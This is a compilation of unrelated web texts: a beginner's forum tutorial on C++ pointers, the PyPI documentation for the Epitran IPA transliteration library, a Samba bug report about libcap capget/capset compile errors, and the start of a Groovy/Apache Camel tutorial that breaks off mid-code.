        "${symbol}: 90.55 HK\$"
    }
}

class MyRouteBuilder extends org.apache.camel.builder.RouteBuilder {
    void configure() {
        from("direct://quote").choice()
            .when(body().contains(".HK")).bean(QuoteServiceBean.class, "hkStock")
            .otherwise().bean(QuoteServiceBean.class, "usStock")
            .end().to("mock://result")

        from("direct://xmlquote").transform().xpath("//quote/@symbol", String.class).to("direct://quote")

        //curl -H "Content-Type: text/xml"
        from('jetty:').transform()
            .simple('<quote symbol="${header.symbol}"></quote>').to("direct://xmlquote").choice()
            .when(header("Content-Type").isEqualTo("text/xml")).to("freemarker:xmlquote.ftl")
            .otherwise().to("freemarker:htmlquote.ftl")
            .end()
    }
}

ctx = new org.apache.camel.impl.DefaultCamelContext()
mrb = new MyRouteBuilder()
ctx.addRoutes mrb
ctx.start()

p = ctx.createProducerTemplate()
//p.sendBody("direct:quote", "00005.HK")
//p.sendBody("direct:xmlquote", "<quote symbol='IBM'/>")
//p.sendBody("direct:xmlquote", "<quote symbol='00005.HK'/>")

e = ctx.getEndpoint("mock://result")
//e.exchanges.each { ex ->
//    println "INFO> in.body='${ex.in.body}'"
//}

OK, you are still here. It is assumed that:
- We have two market data providers, one for the U.S. market and the other for the Hong Kong market.
- An existing QuoteServiceBean class has been implemented as a POJO. It has two methods, usStock() and hkStock(). It is part of a legacy system, it works great, it hides the underlying details of interacting with the data providers. No one understands it and no one dares to modify it.
- We would like to use the existing QuoteServiceBean to provide a stock quote service that can be consumed easily, i.e. Multi-Channel and Multi-Data-Format.

Content Based Router and Message Translator

from("direct://quote").choice()
    .when(body().contains(".HK")).bean(QuoteServiceBean.class, "hkStock")
    .otherwise().bean(QuoteServiceBean.class, "usStock")
    .end().to("mock://result")

The first route (starting at line 17), represented by the direct:quote endpoint, routes the message according to the content of the body of the exchange, which is assumed to contain the stock symbol. When the body of the exchange contains the string ".HK", the hkStock(String symbol) method of QuoteServiceBean is called; otherwise the usStock(String symbol) method is called. Notice that the route DSL almost reads like plain English!

Let us try it out. First start groovysh, load the program and send two messages to the direct:quote endpoint:

[jack@localhost tmp]$ groovysh
Groovy Shell (1.6.6, JVM: 1.6.0_11)
groovy:000> load StockQuote.groovy
..............
groovy:000> p.sendBody("direct:quote", "00001.HK")
===> null
groovy:000> e.exchanges.last()
===> Exchange[Message: 00001.HK: 90.55 HK$]
groovy:000> p.sendBody("direct:quote", "SUNW")
===> null
groovy:000> e.exchanges.last()
===> Exchange[Message: SUNW: 123.50 US$]
groovy:000>

That is it, our simple content-based router successfully routes requests to the corresponding processor methods.

XML Quote Request, Message Transform

from("direct://xmlquote").transform().xpath("//quote/@symbol", String.class).to("direct://quote")

This next route simply accepts requests in XML, transforms the request and chains it to direct://quote. With this, we've added the capability to accept requests in XML format! We are using XPath here to express our transform. Check out the host of Expression Languages supported by Camel.
Let us try it out:

groovy:000> p.sendBody("direct:xmlquote", "<quote symbol='GOOG'/>")
===> null
groovy:000> e.exchanges.last()
===> Exchange[Message: GOOG: 123.50 US$]
groovy:000>

Multi-Channel, Multi-Data-Format Provisioning

Grape.grab(group:"org.apache.camel", module:"camel-jetty", version:"2.0.0")
Grape.grab(group:"org.apache.camel", module:"camel-freemarker", version:"2.0.0")

// ........... lines removed for brevity .............

from('jetty:').transform()
    .simple('<quote symbol="${header.symbol}"></quote>').to("direct://xmlquote").choice()
    .when(header("Content-Type").isEqualTo("text/xml")).to("freemarker:xmlquote.ftl")
    .otherwise().to("freemarker:htmlquote.ftl")
    .end()

Here we use camel-jetty to expose an endpoint jetty: to our quote service. Note that camel-jetty is not part of camel-core. That is why we have to grab it into our program. The HTTP request is translated into XML using a Simple expression. Note that camel-jetty has kindly extracted the request parameters as well as the HTTP headers and placed them on the Message header. So the request parameter symbol is accessed as ${header.symbol} in the expression. Next we simply chain the message exchange to the direct:xmlquote endpoint.

The result from direct:xmlquote goes through another translation, which depends on the Content-Type of the originating HTTP request. Here, I make use of camel-freemarker to generate the desired output. So we need to create the two Freemarker templates:

htmlquote.ftl
<html>
<head>
</head>
<body>
<em>${body}</em>
</body>
</html>

xmlquote.ftl
<quote-result
${body}
</quote-result>

So let us see it in action, I'm going to use curl to make HTTP requests.
Do this on another command window:

[jack@localhost tmp]$ curl
<html>
<head>
</head>
<body>
<em>IBM: 123.50 US$</em>
</body>
</html>
[jack@localhost tmp]$ curl
<html>
<head>
</head>
<body>
<em>00001.HK: 90.55 HK$</em>
</body>
</html>
[jack@localhost tmp]$

And to request XML content:

[jack@localhost tmp]$ curl -H "Content-Type: text/xml"
<quote-result
IBM: 123.50 US$
</quote-result>
[jack@localhost tmp]$

That's about it for our multi-channel/multi-data-format service provision.

Summary

In this tutorial, I hoped to illustrate how Camel supports the message-passing style of application development. Camel provides all sorts of components to help you build processing pipelines. All you need is to implement your business logic as simple POJOs and let Camel handle all the translating, routing, filtering, splitting and forwarding for you. Not shown in this tutorial is how to consume external resources and services from within a route. No sweat, it is just as easy. Camel integrates nicely with Spring as well as Guice, but also works fine on its own. It won't be in your way if you don't need DI support in your application. As they say: Keep the simple easy. Camel works nicely in a JBI environment like ServiceMix and OpenESB. Camel is OSGi-ready and tracks newly deployed bundles for Route definitions at runtime. So you can gear it all the way up to be part of an enterprise SOA infrastructure. Disclaimer, I'm not an experienced Camel user and still learning. Thank you for staying with me.
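As a language-agnostic recap, the two core patterns in this article (the content-based router and the message translator) can be sketched in a few lines of plain Python. This is an illustration of the patterns only, not of Camel's API; the handler functions mirror QuoteServiceBean, and the stdlib XML parser stands in for the XPath expression:

```python
import xml.etree.ElementTree as ET

def hk_stock(symbol):
    return f"{symbol}: 90.55 HK$"

def us_stock(symbol):
    return f"{symbol}: 123.50 US$"

def quote(body):
    # Content-based router: mirrors .when(body().contains(".HK"))
    return hk_stock(body) if ".HK" in body else us_stock(body)

def xml_quote(xml_body):
    # Message translator: stands in for the XPath //quote/@symbol,
    # then chains into the plain-text route, like direct://xmlquote does.
    symbol = ET.fromstring(xml_body).get("symbol")
    return quote(symbol)

print(quote("00001.HK"))                    # 00001.HK: 90.55 HK$
print(xml_quote("<quote symbol='GOOG'/>"))  # GOOG: 123.50 US$
```

The point Camel's DSL makes is exactly this: each step (translate, route, deliver) stays a small, independent function, and the framework wires them together.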
https://dzone.com/articles/groovy-ride-camel
CC-MAIN-2017-30
refinedweb
1,845
52.15
Not too long ago I had written a few tutorials around navigation in a Vue.js web application. I had written about navigating between routes as well as passing data between routes in the form of route parameters and query parameters. When developing a web application with a successful user interface, you're going to want to recycle as many features as possible. Using Vue.js, it is possible to create a multi-level UI by assigning child routes to a parent route within the application. This opens the door to new possibilities in navigation. We're going to see how to use nested routes in a Vue.js web application by assigning child routes and views. While it will be useful to check out my previous navigation article, it won't be absolutely necessary because we're going to brush up on a few of the topics.

For simplicity, we're going to start by creating a fresh Vue.js project. Assuming you have the Vue CLI installed, execute the following command:

vue init webpack nested-project

Answer the questions as prompted by the CLI. It doesn't matter if you choose to use a standalone project or a runtime-only project. What does matter is that you install the vue-router library. When the project scaffold is created, execute the following commands to finish things off:

cd nested-project
npm install

At this point we can start developing our parent and child routes in preparation for some awesome UI functionality. With a fresh CLI generated project, you should have a src/components/HelloWorld.vue file. We can leave it as is, but to keep the flow of this example, it will be easier to understand if we rename it to src/components/page1.vue. This component is going to represent our parent view.
Open the project's src/components/page1.vue file and include the following:

<template>
    <div class="page1">
        <h1>{{ msg }}</h1>
        <router-view></router-view>
    </div>
</template>

<script>
export default {
    name: 'Page1',
    data () {
        return {
            msg: 'Welcome to Your Vue.js App'
        }
    }
}
</script>

<style scoped>
h1, h2 {
    font-weight: normal;
}
a {
    color: #42b983;
}
</style>

The above code is essentially what we get when scaffolding the project. However, in the <template> block notice that we've included <router-view> tags. These tags act as a pass-through for any route that we define. Our child view will pass through these tags. If you open the project's src/App.vue file, you'll notice that it also has <router-view> tags. The parent routes pass through these tags in the src/App.vue file.

When using <router-view> tags, it is important to note that they cannot be at the root level of the <template> block. In other words, this will not work:

<template>
    <router-view></router-view>
</template>

Instead, the <router-view> tags must be inside a <div> element or something similar. With the parent view out of the way, let's focus on the very similar child view that we plan on nesting. Create a src/components/child1.vue file within the project and include the following code:

<template>
    <div class="child1">
        <p>{{ footnote }}</p>
    </div>
</template>

<script>
export default {
    name: 'Child1',
    data () {
        return {
            footnote: 'Created by The Polyglot Developer'
        }
    }
}
</script>

<style scoped></style>

The above code will just display a line of text. The goal is to have it display alongside whatever the previous parent view is displaying. With the two components out of the way, let's focus on wiring the routes together with the vue-router library. All routes for this particular example will be found in the project's src/router/index.js file. If you open it, you'll notice it is still referencing the HelloWorld.vue file that we had previously renamed. We're just going to change up the entire file.
Within the project's src/router/index.js file, include the following:

import Vue from 'vue'
import Router from 'vue-router'
import Page1 from '@/components/page1'
import Child1 from '@/components/child1'

Vue.use(Router)

export default new Router({
    routes: [
        {
            path: "/",
            redirect: { name: "Child1" }
        },
        {
            path: '/page1',
            name: 'Page1',
            component: Page1,
            children: [
                {
                    path: "child1",
                    name: "Child1",
                    component: Child1
                }
            ]
        }
    ]
})

In the above code you'll notice that we're using the redirects that we explored in the previous article. If you run the project, you'll notice that when you navigate to the root of the application, you'll be redirected, and both the parent and nested child view data will be rendered to the screen. Awesome right?

This isn't the only way to accomplish rendering child routes. For example, a default child route could be configured to prevent having to directly navigate to the child path. Take note of the following changes to the src/router/index.js file:

import Vue from 'vue'
import Router from 'vue-router'
import Page1 from '@/components/page1'
import Page2 from '@/components/page2'
import Child1 from '@/components/child1'

Vue.use(Router)

export default new Router({
    routes: [
        {
            path: "/",
            redirect: { name: "Child1" }
        },
        {
            path: '/page1',
            component: Page1,
            children: [
                {
                    path: "",
                    name: "Child1",
                    component: Child1
                }
            ]
        }
    ]
})

In the above code we've removed the name on the parent route and blanked out the child path attribute. Now, when navigating to the parent path, the child is rendered. The need to navigate directly to the child path is removed.

You just saw how to include nested child routes in your Vue.js web application. Having nested children is useful when it comes to templating, among other things. For example, imagine having a settings section of your application where there are multiple settings categories. The settings section could be one of many parent routes while each category could be a child to that parent.
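The way nested routes produce full paths can be sketched in a short, language-agnostic way. This is a simplified model of the behavior described above, not vue-router's actual implementation (which also handles absolute child paths, parameters, and more): a non-empty child path is appended under the parent, while an empty child path renders the child at the parent's own path.

```python
def resolve(parent_path, child_path):
    # Empty child path: the default child renders at the parent's path.
    if child_path == "":
        return parent_path
    # Otherwise the child path is nested under the parent path.
    return parent_path.rstrip("/") + "/" + child_path

print(resolve("/page1", "child1"))  # /page1/child1
print(resolve("/page1", ""))        # /page1
```

This is why blanking out the child's path attribute removes the need to navigate to a deeper URL: the child's resolved path collapses into the parent's.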
If you’re interested in learning more about navigation in a Vue.js application, check out my previous article titled, Use a Router to Navigate Between Pages in a Vue.js Application. If you’d like to know how to pass data between these pages, check out my article titled, Pass Data Between Routes in a Vue.js Web Application.
https://www.thepolyglotdeveloper.com/2017/11/navigate-nested-child-routes-vuejs-web-application/?utm_campaign=Vue.js%20Developers&utm_medium=email&utm_source=Revue%20newsletter
CC-MAIN-2020-24
refinedweb
1,011
63.49
BuildSteps¶

There are a few parent classes that are used as base classes for real buildsteps. This section describes the base classes. The "leaf" classes are described in Build Steps.

BuildStep¶

- class buildbot.process.buildstep.BuildStep(name, ...)¶

A step acts as a factory for more steps. See Writing BuildStep Constructors for advice on writing subclass constructors. The following methods handle this factory behavior.

- addFactoryArguments(..)¶
Add the given keyword arguments to the arguments used to create new step instances.

- getStepFactory()¶
Get a factory for new instances of this step. The step can be created by calling the class with the given keyword arguments.

- setBuild(build)¶
This method is called with the Build that will run this step. The default implementation sets the build attribute.

- setBuildSlave(buildslave)¶
Similarly, this method is called with the build slave that will run this step. The default implementation sets the buildslave attribute.

- setStepStatus(status)¶
This method is called to set the status instance to which the step should report. The default implementation sets step_status.

- setupProgress()¶
This method is called during build setup to give the step a chance to set up progress tracking. It is only called if the build has useProgress set. There is rarely any reason to override this method.

Execution of the step itself is governed by the following methods and attributes.

- startStep(remote)¶
Begin the step. This is the build's interface to step execution. Subclasses should override start to implement custom behaviors. The method returns a Deferred that fires when the step finishes. It fires with a tuple of (result, [extra text]), where result is one of the constants from buildbot.status.builder. The extra text is a list of short strings which should be appended to the Build's text results. For example, a test step may add 17 failures to the Build's status by this mechanism. The deferred will errback if the step encounters an exception, including an exception on the slave side (or if the slave goes away altogether).
Normal build/test failures will not cause an errback.

- start()¶
Begin the step. Subclasses should override this method to do local processing, fire off remote commands, etc. The parent method raises NotImplementedError. Note that this method does not return a Deferred. When the step is done, it should call finished with a result -- a constant from buildbot.status.results. The result will be handed off to the Build. If the step encounters an exception, it should call failed with a Failure object. This method automatically fails the whole build with an exception. A common idiom is to add failed as an errback on a Deferred:

cmd = RemoteCommand(args)
d = self.runCommand(cmd)
def succeed(_):
    self.finished(results.SUCCESS)
d.addCallback(succeed)
d.addErrback(self.failed)

If the step decides it does not need to be run, start can return the constant SKIPPED. In this case, it is not necessary to call finished directly.

- finished(results)¶
A call to this method indicates that the step is finished and the build should analyze the results and perhaps proceed to the next step. The step should not perform any additional processing after calling this. The parent method handles any pending lock operations, and should be called by implementations in subclasses.

- stopped¶
If false, then the step is running. If true, the step is not running, or has been interrupted.

- describe(done=False)¶
This method provides a convenient way to summarize the status of the step for status displays.

LoggingBuildStep¶

This subclass of BuildStep runs a remote command and logs its output. Subclasses should override start and, after setting up an appropriate command, call startCommand:

def start(self):
    cmd = RemoteShellCommand(..)
    self.startCommand(cmd, warnings)

To refine the status output, override one or more of the following methods. The LoggingBuildStep implementation invokes log_eval_func if it exists, and looks at rc to distinguish SUCCESS from FAILURE.
The remaining methods provide an embarrassment of choices; usually the easiest method to override is the one that appends a string describing the step status if it was not successful.

Exceptions¶

- exception buildbot.process.buildstep.BuildStepFailed¶
This exception indicates that the buildstep has failed. It is useful as a way to skip all subsequent processing when a step goes wrong. It is handled by BuildStep.failed.
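The start/finished/failed contract documented above can be mimicked in a self-contained sketch. Note that the result constants, the stub base class, and the EchoStep subclass below are illustrative stand-ins of mine; the real classes are asynchronous, Deferred-based, and live in buildbot.process.buildstep and buildbot.status.results:

```python
# Stub result constants standing in for buildbot.status.results.
SUCCESS, FAILURE, SKIPPED = 0, 2, 3

class BuildStepFailed(Exception):
    """Raised to skip all subsequent processing when a step goes wrong."""

class StubBuildStep:
    def __init__(self):
        self.result = None

    def finished(self, result):
        # In real buildbot, this hands the result off to the Build.
        self.result = result

    def failed(self, why):
        # Real buildbot expects a twisted.python.failure.Failure here.
        self.result = FAILURE

class EchoStep(StubBuildStep):
    """Follows the documented contract: start() does the work and must
    call finished() with a status constant, or failed() on error."""
    def __init__(self, ok=True):
        super().__init__()
        self.ok = ok

    def start(self):
        try:
            if not self.ok:
                raise BuildStepFailed("command returned nonzero")
            self.finished(SUCCESS)
        except BuildStepFailed as why:
            self.failed(why)

good, bad = EchoStep(), EchoStep(ok=False)
good.start()
bad.start()
print(good.result, bad.result)  # 0 2
```

The key point of the contract survives the simplification: start() never returns a result directly; it reports exactly once, through either finished() or failed().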
http://docs.buildbot.net/0.8.6p1/developer/cls-buildsteps.html
CC-MAIN-2021-17
refinedweb
670
59.3
Contents

1.4.8 (2011-09-02)
- rostest: fixed command-line usage documentation #3606
- Bug fix for rxgraph stack trace with bad Node bus info #3579
- roslaunch: bug fix for using rad and deg with rosparam tags #3580
- roslaunch: Fixed bad default value for param in Process.stop() #3582
- roslaunch: performance fix for rad and deg with rosparam YAML files #3620

1.4.7 (2011-07-06)
- Backwards compatibility for rosbuild2 tags
- Suppress messages for Inbound connection failures during shutdown #3390
- FreeBSD Python 2.7 updates #3519 (Thanks Rene Ladan)
- rostopic: bug fix for rostopic bw /clock #3543
- rosgraph_msgs: adding missing dependency on std_msgs
- rosbag: remove references to unused zlib #3566
- rosrecord: link with filesystem-mt #3564

1.4.6 (2011-05-24)
- roslisp: WAIT-UNTIL-READY respects deadlines now.
- roslaunch: "Unable to contact my own XML-RPC server" error message now points at ROS/NetworkSetup.
- test_ros: bug fix for testSlave.py #3411 (thanks rene)
- Patch from andrewstraw to handle EINTR in XMLRPC server #3454

1.4.5 (2011-03-01)
- roswtf: fixed error message/recommendation when ros_comm packages are not built.
- roscpp: Workaround for log4cxx appender errors being printed to console #3375

1.4.4 (2011-02-24)
- roscpp: fix for #3300 stop a few warnings
- roscpp: fix for #3271 Crash on program exit due to destructor ordering and log4cxx
- patch from mdesnoyer to update unit tests for #3357
- rospy: patch from andrewstraw to handle EINTR in tcpros server #3370

1.4.3 (2011-02-21)
- fixed reporting of roslaunch log file names #3339
- patch from timn to add retry logic to requestTopic #3337
- rostime, xmlrpcpp: mingw compatibility patches. #3331, #3332
- roscreate-stack: bug fix for unicode handling issues

1.4.2 (2011-02-15)
- Added printout of ros_comm version when running roscore, backed by Parameter Server for better debugging #3206.
- Better handling of bad test XML output #2917

1.4.1 (2011-02-13)
- roscpp: Add ros::names::parentNamespace
- rosdeps for debian:squeeze #3311
- rostopic: bug fix for YAML separator in plot output #3291
- fixed segfault in log4cxx global destructor #3271
- make variable patch for test_rosbag from rene #3328
- roswtf: more robust to master comm failure #3250

1.4.0 (2011-01-18)

The ros_comm stack was separated from the ros stack after the ROS 1.2.x series. This separation was done as part of the REP 100 work. The main motivation for a separate ros_comm stack is to enable the ROS packaging system to be used separately from the ROS communication system, as well as to decouple their development.

- Python: ros_comm is now Python 2.6 based. Python 2.5 compatibility has been dropped.
- OS X: rosdep dependencies are now Python 2.6 (via Macports).
- Removed install of deprecated rosrecord/rosplay binaries into ROS_ROOT/bin.
- roslib's C++ components split into:
  - rostime: time-related classes (Time, Duration, Rate)
  - cpp_common: macros, debugging tools, types
  - roscpp_traits: message and service traits
  - roscpp_serialization: message serialization
  Everything that was in the ros namespace remains there, so if you have a dependency on roscpp no changes should be required.
- Added support for the xmlrpc calls: GetSubscriptions and GetPublications
- Deprecated defaultMessageCreateFunction in favor of a DefaultMessageCreator functor (#3118, r12091, r12092)
- ros::ok() will now always be false once a service call returns, if the reason for the call's failure is that the node was shutting down (#3020, r12093)
- ros::Publisher::publish() now asserts if the message type is not the same as the advertise() type (#2982, r12094)
- Fixed message trait functions (not classes) when the message type is constant (r12095)
- rostopic: pub -f option for publishing from YAML data.
- better handling of piped data on command line.
- added rostopic list --host option.
- Messages moved out of roslib:
  - roslib/Header → std_msgs/Header
  - roslib/Clock → rosgraph_msgs/Clock
  - roslib/Log → rosgraph_msgs/Log
- rostest: separated out rosunit library and unit-test specific tools. These are now part of the lower-level ros stack.
  - --offline option to run static checks only
  - no longer import roslib.msg. Use std_msgs.msg as test instead.
- updates for REP 100 changes (ros/ros_comm warnings, roslib checks).
- roslaunch: added --dump-params option.
- roslisp: new Python-based message generator
- genmsg_cpp package has been deleted.

Changes since 1.3.4:
- rostopic: bug fix for use of std_msgs/Header
- bag.py now detects and warns if the md5sum and message definition don't match
- new script fix_msg_defs.py tries to repair messages where md5sum and message definition don't match (some of these bags existed due to a bug in rosbag back several generations ago)
- rosbag fix now has a --force option which will skip messages for which migration rules don't exist.
- rosbag fix uses raw mode on the bag to preserve md5sums even if message def is bad. This also speeds up performance significantly.
- generated roslisp binaries find sbcl at runtime now. This is a fix for generated scripts not working when built as Debian packages.
http://wiki.ros.org/ros_comm/ChangeList/1.4/
CC-MAIN-2014-49
refinedweb
812
54.32
Error #1009: at org.robotlegs.mvcs::Actor/dispatch()

I have been banging my head against the wall for about an hour or so, trying to figure out why my service does not seem to get mapped within the framework. I am sure it is something simple I am just overlooking.

Here is what I have within my context:

override public function startup():void {
    var serviceBootsrap:ServiceBootsrap = new ServiceBootsrap(injector);
}

within my ServiceBootsrap:

public function ServiceBootsrap(injector:IInjector) {
    injector.mapClass(ISlideMenuService, MenuItemListService);
}

within my MenuItemListService.parseList():

public class MenuItemListService extends Actor implements ISlideMenuService
.....
private function parseList():void {
    for(var i:Number = 0; i < _list.length ; ++i) {
        //...cool stuff is here.
        dispatch(new MenuComponentsEvent(MenuComponentsEvent.MENU_ITEM, menuItem));
    }
}

I get the Error #1009: at org.robotlegs.mvcs::Actor/dispatch() when it hits the dispatch line in the parseList() method.

Support Staff 1 Posted by Till Schneidere... on 19 Oct, 2011 11:34 AM

The only thing that I can come up with from looking at your code is that you might be invoking parseList too early, i.e., before the injections have happened. Are you by any chance invoking it from the constructor instead of from either a [PostConstruct]-annotated method or from the outside after the injector has fully initialized your service?

2 Posted by visnik on 19 Oct, 2011 03:30 PM

Till, you are awesome, thank you sir. Your question got me to look at the command that injects the service, but I was creating a new service within the execute. As soon as I realized my mistake, commented out the line of code, and boom, all is good. Not sure how I kept missing that yesterday but thanks. I was quite sure it was something simple I was overlooking. Thanks again.
Support Staff 3 Posted by Till Schneidere... on 19 Oct, 2011 03:32 PM Cool, very glad my question helped you get things sorted!
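Till's diagnosis (using an injected dependency before the injector has populated it) is a general DI pitfall, and it can be reproduced with a toy injector in plain Python. This is only an analogy to the Robotlegs/SwiftSuspenders behavior, not their actual mechanics; all class and method names below are invented for illustration:

```python
class Injector:
    """Toy injector: the constructor runs first, fields are filled in after."""
    def __init__(self, mappings):
        self.mappings = mappings

    def instantiate(self, cls):
        obj = cls()                      # constructor runs *before* injection
        for field, dep_cls in self.mappings.items():
            setattr(obj, field, dep_cls())   # injection happens here
        if hasattr(obj, "post_construct"):
            obj.post_construct()         # safe place to use dependencies
        return obj

class EventDispatcher:
    def dispatch(self, event):
        return f"dispatched {event}"

class MenuItemListService:
    event_dispatcher = None  # to be injected

    def __init__(self):
        # Equivalent of calling parseList() (and dispatch()) too early:
        # the dispatcher is still None here -> the #1009 null error.
        self.too_early = self.event_dispatcher is None

    def post_construct(self):
        # By now injection has completed, so dispatch() works.
        self.ready = self.event_dispatcher.dispatch("MENU_ITEM")

svc = Injector({"event_dispatcher": EventDispatcher}).instantiate(MenuItemListService)
print(svc.too_early)  # True: dependency absent during __init__
print(svc.ready)      # dispatched MENU_ITEM
```

The same reasoning explains visnik's actual bug: a service constructed manually with `new` never goes through the injector at all, so its dependencies stay null no matter when they are used.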
http://robotlegs.tenderapp.com/discussions/problems/403-error-1009-at-orgrobotlegsmvcsactordispatch
CC-MAIN-2019-13
refinedweb
344
57.57
Webpack 2.2 has reached release candidate 4, the last pre-release version. Time to update! My motivation was "Ugh, I'm tired of these 3min+ local compile times. The amount of waiting is too damn high!" The new features are a nice bonus too. After many days of fiddling, my Webpack is ready. Production compiles take 219 seconds instead of 226, and local dev compilation takes 152 seconds instead of 151. It's not that worth it, but incremental compiles with Webpack in watch mode feel smooth as silk. I love the new feature that highlights big files and tells you initial load sizes for different apps. I've been using it to eyeball different options, and I'm sure it has bigger use cases, too. Fine-tuning code splitting perhaps? Then again, rc4 just disabled these features by default "because they're annoying". I liked it. Webpack recommends keeping files under 250kB, which sounds like a lot, but it looks damn small compared to my code. Did you know 196kB of source ES6 compiles into about 920kB of browser-ready JavaScript? With minification, tree shaking, and dead code elimination! Without that, it's 2.3 megs. The day when we ship raw ES6 code can't come soon enough. BTW: Tree shaking removes unused dependencies (like when you import a whole library but just use a function or two), and dead code elimination removes code that's unreachable, like functions you never call. So is upgrading to Webpack 2 even worth it? Totally. Once they and the ecosystem resolve some issues, tree shaking will ride eternal, shiny and chrome. Here are some gotchas I discovered while upgrading.

It's not quiiiiite ready yet (dependency hellish)

You can use Webpack 2 in production. I'm about to start. Although now that they've promised to release the final version in < 10 days, I might wait. Or gently delay the code review and QA process until their release. We'll see :) But here's one thing that's really awkward right now.
When you upgrade to Webpack 2.2.rc.x, you fall into a small dependency hell with extract-text-webpack-plugin. The released version depends on Webpack 2.1, which is silly. If you're going bleeding edge, you might as well go all the way, ya know? So here's what you have to do:

// package.json
"dependencies": {
  // ...
  "extract-text-webpack-plugin": "git://github.com/webpack/extract-text-webpack-plugin#cbd4690",
  "webpack": "^2.2.0-rc.3"
}

I'd show you the npm install command, but I don't know how to point at specific commits. See that #cbd4690 hash? That's the exact commit that says Add webpack 2 RC compatibility. This is fragile and a terrible idea. You will forget to update this dependency in the future, and it will continue to point at a random commit for the foreseeable future. Happens every time. But the published version on npm doesn't work. I assume they'll fix it for the final release.

Why extract-text-webpack-plugin? It makes stylesheet imports better, I'm told. See? Useful. You also have to update babel-loader to at least 6.2.10. That's when they added support for the Webpack 2 rc.

Funny config updates, but better docs

The new Webpack 2 docs are so much better. Check out this wonderful Migrating from v1 to v2 official guide. You basically have to do a find & replace, and you're done. Just don't forget to take '' out of resolve.extensions. I don't remember why everyone needed that in the past, but I know that the new Webpack throws an error. Error reports for bad configuration are also better now. That was fun to see. Loved it.

CSS/Less and PostCSS plugin

If you're not using Webpack to load CSS and compile Less or Sass, you should. It's made my life a lot easier. Especially the PostCSS plugin makes your CSS easier to write. Going from Webpack v1 to Webpack v2 involved many changes in this config.
We used to have this:

// webpack.config.js
loaders: [
  // ...
  {
    test: /\.(less|css)$/,
    loader: ExtractTextPlugin.extract("style/useable", "css?sourceMap!postcss-loader!less-loader?sourceMap=true"),
    include: [path.resolve(__dirname, "app/assets/stylesheets")]
  },
  {
    test: /\.css$/,
    loader: ExtractTextPlugin.extract("style/useable", "css?sourceMap!postcss-loader?sourceMap=true")
  },
  // ...
],
postcss: function () {
  return [
    precss,
    // UglifyJSPlugin mangles valid css during minification. It is a known issue and this fix was obtained from:
    require("postcss-import")({ addDependencyTo: webpack }),
    postcssURL(),
    postcssNext({
      browsers: ['last 2 versions', 'ie >= 9'],
      compress: true
    }),
    cssnano({ zindex: false })
    // end UglifyJSPlugin fix
  ];
}

Which is probably too much config, but it worked. With Webpack v2 that's become more manageable and looks like this:

// webpack.config.js
module: {
  rules: [
    {
      test: /\.(less|css)$/,
      use: [
        ExtractTextPlugin.extract({
          fallbackLoader: "style/useable",
          loader: "style-loader"
        }),
        {
          loader: 'css-loader?sourceMap',
          query: {
            modules: true,
            importLoaders: 2
          }
        },
        'postcss-loader?sourceMap',
        'less-loader?sourceMap'
      ]
    },
  ]
},

So much less code! That's because a lot of it is now in a different file called postcss.config.js. That one is a copy-paste of the detailed config for postcss itself:

const webpack = require("webpack");

module.exports = {
  plugins: [
    // UglifyJSPlugin mangles valid css during minification. It is a known issue and this fix was obtained from:
    require("postcss-import")({ addDependencyTo: webpack }),
    require("postcss-url"),
    require("postcss-cssnext")({
      browsers: ["last 2 versions", "ie >= 9"],
      compress: true,
    }),
    require("cssnano")({ zindex: false }),
    // end UglifyJSPlugin fix
  ],
};

I don't know if the UglifyJS bug we're working around still exists, so I left the config as I found it. Just to be safe. Looking at code blobs is hard, so here's what happened:

- Webpack 2 no longer allows plugin-specific config keys like postcss. Everything must fit in the rules.use listing.
- PostCSS now uses a separate config file called postcss.config.js. This works out of the box.
- I removed separate rules for compiled and uncompiled CSS.
- Everything goes in the rules.use array.
- Use rules evaluate last to first.
- First, we use less-loader to compile Less to CSS.
- Then, we use postcss-loader to do the PostCSS changes.
- Then, css-loader enables import css from 'file.css'.
- Finally, ExtractTextPlugin puts it in <style>.

All of this used to be encoded in the loader bang syntax before: css?sourceMap!postcss-loader!less-loader?sourceMap=true

Whoever came up with the use: [] syntax, you're the best. I love the new approach.

Tree shaking and optimization

Now for the reason we're all here: tree shaking. Webpack 2 understands native ES6 imports and uses them as split points. That means it can organize your code into different chunks so you're only loading the JavaScript that you're using. What it also means is that it understands when you're importing more than you need. Combined with the UglifyJsPlugin, it can eliminate that extra code. I spent a lot of time looking for what exactly turns this feature on. Turns Out™, it's on by default. Just Works™.
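The last-to-first rule trips people up, so here's the same idea as plain right-to-left function composition, sketched in C. The "loaders" below are made-up stand-ins (nothing here is Webpack API); the sketch only mirrors how a use array is applied from the end of the list back to the front.

```c
/* A "loader" is just a transform; here, int -> int for simplicity. */
typedef int (*loader_fn)(int);

static int to_css(int x)  { return x + 1; }   /* stand-in for less-loader   */
static int postcss(int x) { return x * 2; }   /* stand-in for postcss-loader */
static int extract(int x) { return x - 3; }   /* stand-in for the extractor  */

/* Webpack applies a `use` array from the LAST entry to the FIRST. */
static int run_pipeline(const loader_fn *use, int n, int input) {
    for (int i = n - 1; i >= 0; i--)
        input = use[i](input);
    return input;
}

/* Mirrors use: [extract, postcss, to_css] — to_css runs first. */
static int demo_pipeline(int input) {
    const loader_fn use[] = { extract, postcss, to_css };
    return run_pipeline(use, 3, input);
}
```

With input 5, to_css gives 6, postcss gives 12, extract gives 9 — the same ordering the bullet list above describes for less-loader, postcss-loader, css-loader, and ExtractTextPlugin.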
Here's what you have to do:

- Tell Babel not to compile imports into CommonJS (require stuff)
- Enable UglifyJS

// webpack.config.js
rules: [
  {
    test: /\.js$/,
    include: [path.resolve(__dirname, "app/assets/javascripts")],
    exclude: [path.resolve(__dirname, "node_modules/")],
    query: {
      plugins: [
        "transform-decorators-legacy",
        "transform-runtime",
        "transform-object-rest-spread",
        "transform-react-constant-elements",
        "transform-class-properties",
      ],
      presets: [["es2015", { modules: false }], "latest", "react"],
    },
    loader: "babel-loader",
  },
];

// ...

plugins: [
  new webpack.optimize.UglifyJsPlugin({
    compress: {
      warnings: false,
      screw_ie8: true,
      conditionals: true,
      unused: true,
      comparisons: true,
      sequences: true,
      dead_code: true,
      evaluate: true,
      join_vars: true,
      if_return: true,
    },
    output: {
      comments: false,
    },
  }),
];

See that { modules: false } in the babel-loader config? That's new. You can specify options when defining Babel plugins and presets. modules: false tells the es2015 preset to avoid compiling import statements into CommonJS. That lets Webpack do tree shaking on your code.

UglifyJsPlugin without extra config will do what we need, but I wanted to show you the options. It's unused and dead_code that enable tree shaking.

However, we have to wait for the ecosystem to catch up. Most libraries are distributed with ES6 modules compiled to ES5, so in a real-world scenario, you only get about a 4% improvement. With Webpack 2 around the corner, this is sure to improve. Can't wait!

